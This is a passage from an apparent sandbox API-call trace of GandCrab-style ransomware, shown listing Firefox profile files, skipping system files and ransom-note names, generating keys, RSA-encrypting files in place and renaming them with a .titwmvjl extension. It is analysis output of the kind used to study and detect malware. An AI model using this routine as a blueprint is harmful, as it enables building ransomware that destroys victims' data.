lstrcmpW (lpString1="state.json", lpString2="..") returned 1 [0081.976] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\", lpString2="state.json" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\state.json") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\state.json" [0081.976] lstrlenW (lpString=".titwmvjl") returned 9 [0081.976] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\state.json") returned 104 [0081.976] VirtualAlloc (lpAddress=0x0, dwSize=0x110, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0081.977] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\state.json.titwmvjl") returned 113 [0081.977] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\state.json") returned 104 [0081.977] lstrlenW (lpString=".json") returned 5 [0081.977] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0081.977] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".json ") returned 6 [0081.977] lstrcmpiW (lpString1=".json", lpString2=".titwmvjl") returned -1 [0081.977] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.977] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\state.json") returned 104 [0081.977] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\state.json") returned 104 [0081.977] lstrcmpiW (lpString1="state.json", lpString2="desktop.ini") returned 1 [0081.977] lstrcmpiW (lpString1="state.json", lpString2="autorun.inf") returned 1 [0081.977] lstrcmpiW (lpString1="state.json", lpString2="ntuser.dat") returned 1 [0081.977] lstrcmpiW (lpString1="state.json", lpString2="iconcache.db") returned 1 [0081.977] lstrcmpiW (lpString1="state.json", lpString2="bootsect.bak") returned 1 [0081.977] lstrcmpiW (lpString1="state.json", lpString2="boot.ini") returned 1 [0081.977] lstrcmpiW (lpString1="state.json", lpString2="ntuser.dat.log") returned 1 [0081.977] lstrcmpiW (lpString1="state.json", lpString2="thumbs.db") returned -1 [0081.977] lstrcmpiW (lpString1="state.json", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0081.977] lstrcmpiW (lpString1="state.json", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0081.977] lstrcmpiW (lpString1="state.json", lpString2="KRAB-DECRYPT.html") returned 1 [0081.977] lstrcmpiW (lpString1="state.json", lpString2="CRAB-DECRYPT.html") returned 1 [0081.977] lstrcmpiW (lpString1="state.json", lpString2="KRAB-DECRYPT.txt") returned 1 [0081.977] lstrcmpiW (lpString1="state.json", lpString2="CRAB-DECRYPT.txt") returned 1 [0081.977] lstrcmpiW (lpString1="state.json", lpString2="ntldr") returned 1 [0081.977] lstrcmpiW (lpString1="state.json", lpString2="NTDETECT.COM") returned 1 [0081.977] lstrcmpiW (lpString1="state.json", lpString2="Bootfont.bin") returned 1 [0081.977] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\state.json") returned 104 [0081.978] lstrlenW (lpString=".json") returned 5 [0081.978] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0081.978] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".json ") returned 6 [0081.978] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.978] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0081.978] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\state.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\state.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2dc [0081.979] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0081.979] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.979] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4cda48) returned 1 [0081.982] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0081.982] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0081.982] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0081.982] CryptGenRandom (in: hProv=0x4cda48, dwLen=0x20, pbBuffer=0x259e4b4 | out: pbBuffer=0x259e4b4) returned 1 [0081.982] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.983] CryptReleaseContext (hProv=0x4cda48, dwFlags=0x0) returned 1 [0081.983] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.983] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.983] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4cda48) returned 1 [0081.986] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0081.986] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0081.986] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0081.986] CryptGenRandom (in: hProv=0x4cda48, dwLen=0x8, pbBuffer=0x259e4d4 | out: pbBuffer=0x259e4d4) returned 1 [0081.986] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.986] CryptReleaseContext (hProv=0x4cda48, dwFlags=0x0) returned 1 [0081.986] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.987] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.987] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4cda48) returned 1 [0081.989] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.989] CryptImportKey (in: hProv=0x4cda48, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x503578) returned 1 [0081.990] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.990] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0081.990] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.990] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e44c*=0x100) returned 1 [0081.990] GetLastError () returned 0x0 [0081.990] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.991] CryptDestroyKey (hKey=0x503578) returned 1 [0081.991] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.991] CryptReleaseContext (hProv=0x4cda48, dwFlags=0x0) returned 1 [0081.991] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.991] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4cda48) returned 1 [0081.994] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.994] CryptImportKey (in: hProv=0x4cda48, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x5037b8) returned 1 [0081.994] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.994] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0081.994] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.994] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e44c*=0x100) returned 1 [0081.995] GetLastError () returned 0x0 [0081.995] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.995] CryptDestroyKey (hKey=0x5037b8) returned 1 [0081.995] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.995] CryptReleaseContext (hProv=0x4cda48, dwFlags=0x0) returned 1 [0081.995] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0081.995] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0081.995] ReadFile (in: hFile=0x2dc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e4f8, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e4f8*=0x33, lpOverlapped=0x0) returned 1 [0082.005] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xffffffcd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.005] WriteFile (in: hFile=0x2dc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x33, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e4dc*=0x33, lpOverlapped=0x0) returned 1 [0082.006] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.006] WriteFile (in: hFile=0x2dc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259e4dc*=0x21c, lpOverlapped=0x0) returned 1 [0082.008] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.012] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.013] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.013] CloseHandle (hObject=0x2dc) returned 1 [0082.014] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\state.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\state.json"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\state.json.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\state.json.titwmvjl"), dwFlags=0x1) returned 1 [0082.015] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.016] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0082.016] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0082.016] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0082.016] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\TITWMVJL-DECRYPT.txt" [0082.016] lstrlenW (lpString=".titwmvjl") returned 9 [0082.016] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\TITWMVJL-DECRYPT.txt") returned 114 [0082.016] VirtualAlloc (lpAddress=0x0, dwSize=0x124, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0082.016] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 123 [0082.016] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\TITWMVJL-DECRYPT.txt") returned 114 [0082.016] lstrlenW (lpString=".txt") returned 4 [0082.016] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0082.017] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0082.017] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0082.017] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.017] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\TITWMVJL-DECRYPT.txt") returned 114 [0082.017] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\TITWMVJL-DECRYPT.txt") returned 114 [0082.017] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0082.017] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0082.017] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0082.017] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0082.017] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0082.017] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0082.017] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0082.017] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0082.017] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.017] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 0 [0082.017] FindClose (in: hFindFile=0x503738 | out: hFindFile=0x503738) returned 1 [0082.018] CloseHandle (hObject=0x2d4) returned 1 [0082.019] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0082.019] lstrcmpW (lpString1="extensions.ini", lpString2=".") returned 1 [0082.019] lstrcmpW (lpString1="extensions.ini", lpString2="..") returned 1 [0082.019] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="extensions.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.ini" [0082.019] lstrlenW (lpString=".titwmvjl") returned 9 [0082.019] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.ini") returned 94 [0082.019] VirtualAlloc (lpAddress=0x0, dwSize=0xfc, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0082.019] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.ini.titwmvjl") returned 103 [0082.019] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.ini") returned 94 [0082.019] lstrlenW (lpString=".ini") returned 4 [0082.019] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0082.020] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".ini ") returned 5 [0082.020] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0082.020] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.020] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.ini") returned 94 [0082.020] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.ini") returned 94 [0082.020] lstrcmpiW (lpString1="extensions.ini", lpString2="desktop.ini") returned 1 [0082.020] lstrcmpiW (lpString1="extensions.ini", lpString2="autorun.inf") returned 1 [0082.020] lstrcmpiW (lpString1="extensions.ini", lpString2="ntuser.dat") returned -1 [0082.020] lstrcmpiW (lpString1="extensions.ini", lpString2="iconcache.db") returned -1 [0082.020] lstrcmpiW (lpString1="extensions.ini", lpString2="bootsect.bak") returned 1 [0082.020] lstrcmpiW (lpString1="extensions.ini", lpString2="boot.ini") returned 1 [0082.020] lstrcmpiW (lpString1="extensions.ini", lpString2="ntuser.dat.log") returned -1 [0082.020] lstrcmpiW (lpString1="extensions.ini", lpString2="thumbs.db") returned -1 [0082.020] lstrcmpiW (lpString1="extensions.ini", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0082.020] lstrcmpiW (lpString1="extensions.ini", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0082.020] lstrcmpiW (lpString1="extensions.ini", lpString2="KRAB-DECRYPT.html") returned -1 [0082.020] lstrcmpiW (lpString1="extensions.ini", lpString2="CRAB-DECRYPT.html") returned 1 [0082.020] lstrcmpiW (lpString1="extensions.ini", lpString2="KRAB-DECRYPT.txt") returned -1 [0082.020] lstrcmpiW (lpString1="extensions.ini", lpString2="CRAB-DECRYPT.txt") returned 1 [0082.020] lstrcmpiW (lpString1="extensions.ini", lpString2="ntldr") returned -1 [0082.020] lstrcmpiW (lpString1="extensions.ini", lpString2="NTDETECT.COM") returned -1 [0082.020] lstrcmpiW (lpString1="extensions.ini", lpString2="Bootfont.bin") returned 1 [0082.020] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.ini") returned 94 [0082.020] lstrlenW (lpString=".ini") returned 4 [0082.020] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0082.020] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".ini ") returned 5 [0082.020] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.021] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0082.021] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.ini" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\extensions.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0082.021] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.021] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.022] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cda48) returned 1 [0082.024] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0082.025] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0082.025] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0082.025] CryptGenRandom (in: hProv=0x4cda48, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0082.025] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.025] CryptReleaseContext (hProv=0x4cda48, dwFlags=0x0) returned 1 [0082.025] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.025] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.025] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cda48) returned 1 [0082.028] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0082.028] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0082.028] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0082.028] CryptGenRandom (in: hProv=0x4cda48, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0082.028] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.028] CryptReleaseContext (hProv=0x4cda48, dwFlags=0x0) returned 1 [0082.028] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.029] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.029] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cda48) returned 1 [0082.032] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.032] CryptImportKey (in: hProv=0x4cda48, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503938) returned 1 [0082.032] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.032] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0082.032] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.032] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0082.033] GetLastError () returned 0x0 [0082.033] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.034] CryptDestroyKey (hKey=0x503938) returned 1 [0082.034] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.034] CryptReleaseContext (hProv=0x4cda48, dwFlags=0x0) returned 1 [0082.034] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.034] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cda48) returned 1 [0082.038] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.038] CryptImportKey (in: hProv=0x4cda48, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503578) returned 1 [0082.038] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.039] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0082.039] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.039] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0082.039] GetLastError () returned 0x0 [0082.039] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.039] CryptDestroyKey (hKey=0x503578) returned 1 [0082.040] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.040] CryptReleaseContext (hProv=0x4cda48, dwFlags=0x0) returned 1 [0082.040] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0082.040] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0082.040] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0xb9, lpOverlapped=0x0) returned 1 [0082.057] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xffffff47, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.057] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xb9, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0xb9, lpOverlapped=0x0) returned 1 [0082.060] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.060] WriteFile (in: hFile=0x2d4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0082.062] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.065] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.066] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.066] CloseHandle (hObject=0x2d4) returned 1 [0082.069] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.ini" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\extensions.ini"), 